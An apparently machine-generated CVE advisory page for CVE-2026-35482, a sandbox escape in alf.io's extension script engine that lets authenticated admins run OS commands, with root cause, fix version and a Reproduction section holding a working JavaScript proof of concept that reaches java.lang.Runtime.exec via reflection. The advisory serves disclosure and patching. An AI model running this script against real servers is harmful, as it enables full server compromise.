CVE-2026-35482
Description
CVE-2026-35482: Alf.io extension script engine sandbox escape allows authenticated admins to run OS commands.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CVE-2026-35482: Alf.io extension script engine sandbox escape allows authenticated admins to run OS commands.
Vulnerability
Prior to version 2.0-M5-2606, alf.io's extension script engine contained a sandbox escape vulnerability. The system intended to execute JavaScript in a sandboxed Rhino environment, but an unguarded injected Java object (returnClass) combined with an incomplete AST blocklist allowed for full sandbox escape via Java reflection, bypassing intended restrictions. The vulnerability is triggered when an extension script is saved via POST /admin/api/extensions [1].
Exploitation
An authenticated administrator can exploit this vulnerability by saving a malicious extension script. The injected code executes when a specific event fires, such as INVOICE_GENERATION on the first ticket purchase with invoicing enabled. The attacker needs administrator privileges and the ability to upload extension scripts. No further user interaction is required after the script is saved [1].
Impact
Successful exploitation allows an authenticated administrator to execute arbitrary operating system commands on the server. This provides a complete compromise of the server hosting the alf.io application, enabling attackers to gain full control over the system and potentially access sensitive data or disrupt services [1].
Mitigation
Version 2.0-M5-2606 addresses this vulnerability. Users are advised to upgrade to this version or later. No workarounds are specified in the available references, and the system is not listed as end-of-life or on the KEV catalog [1].
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <2.0-M5-2606
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The extension script engine improperly injects an unrestricted Java Class object, allowing Java reflection to bypass sandbox restrictions."
Attack vector
An authenticated administrator can trigger this vulnerability by uploading a malicious extension script to the `/admin/api/extensions` endpoint. The script contains JavaScript that uses the injected `returnClass` object to access `java.lang.Runtime` via reflection. This allows arbitrary operating system commands to be executed on the server when the script's associated event fires, such as `INVOICE_GENERATION` [ref_id=1].
Affected code
The vulnerability lies within the alf.io extension script engine, specifically in the `ScriptingExecutionService.executeScriptFinally()` method where the `returnClass` object is injected into the script scope. This injection allows for the bypass of static AST validation and the `JavaClassInterop` whitelist [ref_id=1].
What the fix does
Version 2.0-M5-2606 addresses the vulnerability by removing the unguarded injection of the `returnClass` object into the script scope. This prevents attackers from using Java reflection to bypass the sandbox and execute arbitrary commands, as the necessary entry point for reflection is no longer available [ref_id=1].
Preconditions
- authThe attacker must have administrator privileges.
Reproduction
Paste the following into the alf.io extension editor (or POST it to /admin/api/extensions): ```javascript function getScriptMetadata() { return { id: 'rce-validate', displayName: 'RCE Validate', version: 0, async: false, events: ['TICKET_ASSIGNED','INVOICE_GENERATION'] }; }
function executeScript(scriptEvent) { var rtClass = returnClass.forName('java.lang.Runtime');
var strClass = returnClass.forName('java.lang.String');
var runtime = rtClass.getMethod('getRuntime').invoke(null);
var proc = rtClass.getMethod('exec', strClass).invoke(runtime, 'id');
var bytes = proc.getInputStream().readAllBytes();
var output = '';
for (var i = 0; i < bytes.length; i++) { output += String.fromCharCode(bytes[i] & 0xFF); } console.log(output); return { invoiceNumber: output }; } ``` The `id` command output will appear as the generated invoice number in the UI and in the extension log (GET /admin/api/extensions/log). Any shell command can be substituted [ref_id=1].
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.